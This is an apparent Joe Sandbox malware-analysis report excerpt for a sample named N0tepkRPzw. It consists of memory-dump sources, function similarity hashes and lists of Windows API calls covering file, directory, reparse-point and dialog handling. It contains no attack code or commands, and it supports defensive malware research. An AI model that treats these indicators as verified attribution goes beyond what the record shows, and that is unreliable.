              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 63a5c545da5dceddf04db35381c0239c57a063e596319c002e1d43ab9136029f
              • Instruction ID: 7a9693e0ef4fdafd650137faa1da5c208e7009b6fd3c652aafa3eeb6730ad089
              • Opcode Fuzzy Hash: 63a5c545da5dceddf04db35381c0239c57a063e596319c002e1d43ab9136029f
              • Instruction Fuzzy Hash: 57A001E6BAD143BE31087292BD16D3A225EC8E4B613348A1BB44B9408AE99898495931
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DAB2
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 9d5c5034096f1fe1549a24755831c7243270599d3355ce01c3a6d46625b6c9cd
              • Instruction ID: 7a9693e0ef4fdafd650137faa1da5c208e7009b6fd3c652aafa3eeb6730ad089
              • Opcode Fuzzy Hash: 9d5c5034096f1fe1549a24755831c7243270599d3355ce01c3a6d46625b6c9cd
              • Instruction Fuzzy Hash: 57A001E6BAD143BE31087292BD16D3A225EC8E4B613348A1BB44B9408AE99898495931
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DAB2
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: c1385074bd02b01dd54a096d6c7e59edeb79b3196b65b1ca43c8b5829f16081a
              • Instruction ID: 7a9693e0ef4fdafd650137faa1da5c208e7009b6fd3c652aafa3eeb6730ad089
              • Opcode Fuzzy Hash: c1385074bd02b01dd54a096d6c7e59edeb79b3196b65b1ca43c8b5829f16081a
              • Instruction Fuzzy Hash: 57A001E6BAD143BE31087292BD16D3A225EC8E4B613348A1BB44B9408AE99898495931
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DAB2
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: f831d4b88931bcf000427c2627871e8349c412b7186732c9807ca8678f79212b
              • Instruction ID: 91c8f7f53a9c558b5b59a69e1413e6c65b18b815d564d0750f967ea63150cfcf
              • Opcode Fuzzy Hash: f831d4b88931bcf000427c2627871e8349c412b7186732c9807ca8678f79212b
              • Instruction Fuzzy Hash: 09A001E6BAD5427E3148B292BD16D3A225ED8E0B22334861BB44BA408AE99898495931
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DBD5
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 6388f300cb45f8f8e345a7ac111d6fde53517eead2728d8325638e9989b312a4
              • Instruction ID: f60019751a0afaa2604b6f988cb97fb5c4396330d842224cdeaa00950ffe47e2
              • Opcode Fuzzy Hash: 6388f300cb45f8f8e345a7ac111d6fde53517eead2728d8325638e9989b312a4
              • Instruction Fuzzy Hash: 0CA011EABAC003BE300822003C0BC3A222EC8C0B20330880AB00A80080EE808C088030
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DC36
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: ec82ab6d2d9cab0d1bebc147bebef68e6aa8a810f74cbb52e18e0c738816d11a
              • Instruction ID: 39269f8cf192306b3ef321f0304c0c7514a97806136fa0cb3f34193f60a0dc7d
              • Opcode Fuzzy Hash: ec82ab6d2d9cab0d1bebc147bebef68e6aa8a810f74cbb52e18e0c738816d11a
              • Instruction Fuzzy Hash: 89A011EABAC203BE300CB2203C02C3A222EC8C8B20330880AB00AE0080EA80AC088030
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DC36
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 6be2d8afa01cf7642db4be852cf151c370dbd2e93bd803ce2b378e59f8069875
              • Instruction ID: 39269f8cf192306b3ef321f0304c0c7514a97806136fa0cb3f34193f60a0dc7d
              • Opcode Fuzzy Hash: 6be2d8afa01cf7642db4be852cf151c370dbd2e93bd803ce2b378e59f8069875
              • Instruction Fuzzy Hash: 89A011EABAC203BE300CB2203C02C3A222EC8C8B20330880AB00AE0080EA80AC088030
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DBD5
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e72df58bdf78a69c41e7577345280b9b6ef50770884ed8b89972ab69ffc8dc59
              • Instruction ID: f60019751a0afaa2604b6f988cb97fb5c4396330d842224cdeaa00950ffe47e2
              • Opcode Fuzzy Hash: e72df58bdf78a69c41e7577345280b9b6ef50770884ed8b89972ab69ffc8dc59
              • Instruction Fuzzy Hash: 0CA011EABAC003BE300822003C0BC3A222EC8C0B20330880AB00A80080EE808C088030
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DBD5
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 407858999a0fc798dc5ebcd2d9e64b539132fd9b7f63aea272d63f0be7d0e0ed
              • Instruction ID: f60019751a0afaa2604b6f988cb97fb5c4396330d842224cdeaa00950ffe47e2
              • Opcode Fuzzy Hash: 407858999a0fc798dc5ebcd2d9e64b539132fd9b7f63aea272d63f0be7d0e0ed
              • Instruction Fuzzy Hash: 0CA011EABAC003BE300822003C0BC3A222EC8C0B20330880AB00A80080EE808C088030
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00D6DBD5
                • Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
                • Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 07a1eef3a8ef63ba0e50ce232784e42cb1f449811e27081eecdd3e4a342433ad
              • Instruction ID: f60019751a0afaa2604b6f988cb97fb5c4396330d842224cdeaa00950ffe47e2
              • Opcode Fuzzy Hash: 07a1eef3a8ef63ba0e50ce232784e42cb1f449811e27081eecdd3e4a342433ad
              • Instruction Fuzzy Hash: 0CA011EABAC003BE300822003C0BC3A222EC8C0B20330880AB00A80080EE808C088030
              APIs
              • SetEndOfFile.KERNELBASE(?,00D59104,?,?,-00001964), ref: 00D59EC2
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: File
              • String ID:
              • API String ID: 749574446-0
              • Opcode ID: e2b925b72c156ce36191db02f8fedff8c3c5ff13e72956961996f70e1a292efb
              • Instruction ID: 025f364d5bafede29822ecfb494a772cff248922b2f81be93e99bf0c6ebc4bc6
              • Opcode Fuzzy Hash: e2b925b72c156ce36191db02f8fedff8c3c5ff13e72956961996f70e1a292efb
              • Instruction Fuzzy Hash: F4B011300B020A8A8E002F30CC088283A20EA22B0A32082A0A00ACA0A0CB22C002AB00
              APIs
              • SetCurrentDirectoryW.KERNELBASE(?,00D6A587,C:\Users\user\Desktop,00000000,00D9946A,00000006), ref: 00D6A326
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              • Opcode ID: 30d50a654ef0d79091859185056d34f4f696cfe5ae5c737919e02347cb6e5e9e
              • Instruction ID: dfd001cdf7f1fa31d58d4db681d3b71587b3839e29f222f5ee0d11d337ffd0bb
              • Opcode Fuzzy Hash: 30d50a654ef0d79091859185056d34f4f696cfe5ae5c737919e02347cb6e5e9e
              • Instruction Fuzzy Hash: A2A012301A4206568A000B30CC0DC1576505760F02F0086207006C00A0CB308814A710
              APIs
                • Part of subcall function 00D5130B: GetDlgItem.USER32(00000000,00003021), ref: 00D5134F
                • Part of subcall function 00D5130B: SetWindowTextW.USER32(00000000,00D835B4), ref: 00D51365
              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00D6B971
              • EndDialog.USER32(?,00000006), ref: 00D6B984
              • GetDlgItem.USER32(?,0000006C), ref: 00D6B9A0
              • SetFocus.USER32(00000000), ref: 00D6B9A7
              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00D6B9E1
              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00D6BA18
              • FindFirstFileW.KERNEL32(?,?), ref: 00D6BA2E
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D6BA4C
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D6BA5C
              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D6BA78
              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D6BA94
              • _swprintf.LIBCMT ref: 00D6BAC4
                • Part of subcall function 00D5400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D5401D
              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00D6BAD7
              • FindClose.KERNEL32(00000000), ref: 00D6BADE
              • _swprintf.LIBCMT ref: 00D6BB37
              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00D6BB4A
              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00D6BB67
              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00D6BB87
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D6BB97
              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D6BBB1
              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D6BBC9
              • _swprintf.LIBCMT ref: 00D6BBF5
              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00D6BC08
              • _swprintf.LIBCMT ref: 00D6BC5C
              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00D6BC6F
                • Part of subcall function 00D6A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D6A662
                • Part of subcall function 00D6A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00D8E600,?,?), ref: 00D6A6B1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
              • API String ID: 797121971-1840816070
              • Opcode ID: d822a0bb07acf02dacdf9c6fb1b8fb45b701f78603eabe2a40ced71eda1e8b71
              • Instruction ID: f509a6d7b23310bbc7a866b0b0e55543b872209b0287e1950983668ba5c94a9a
              • Opcode Fuzzy Hash: d822a0bb07acf02dacdf9c6fb1b8fb45b701f78603eabe2a40ced71eda1e8b71
              • Instruction Fuzzy Hash: 6A919372148348BFE621ABA4DC49FFB77ACEB49B11F04091AF789D2191D77196048B72
              APIs
              • __EH_prolog.LIBCMT ref: 00D57191
              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00D572F1
              • CloseHandle.KERNEL32(00000000), ref: 00D57301
                • Part of subcall function 00D57BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D57C04
                • Part of subcall function 00D57BF5: GetLastError.KERNEL32 ref: 00D57C4A
                • Part of subcall function 00D57BF5: CloseHandle.KERNEL32(?), ref: 00D57C59
              • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00D5730C
              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00D5741A
              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00D57446
              • CloseHandle.KERNEL32(?), ref: 00D57457
              • GetLastError.KERNEL32 ref: 00D57467
              • RemoveDirectoryW.KERNEL32(?), ref: 00D574B3
              • DeleteFileW.KERNEL32(?), ref: 00D574DB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
              • API String ID: 3935142422-3508440684
              • Opcode ID: d4eec29b13eea449ee3137e052ecc2907c995bb9b89b2c317318acf31ddb9b7c
              • Instruction ID: ab4724cfe8abf8a4358017cb8f41215584d6288977d199f161120d685ee0a5bc
              • Opcode Fuzzy Hash: d4eec29b13eea449ee3137e052ecc2907c995bb9b89b2c317318acf31ddb9b7c
              • Instruction Fuzzy Hash: 70B1EF71904214AADF21DF64EC45BEEBBB8EF04701F144169FD49E7242E734AA49CB71
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
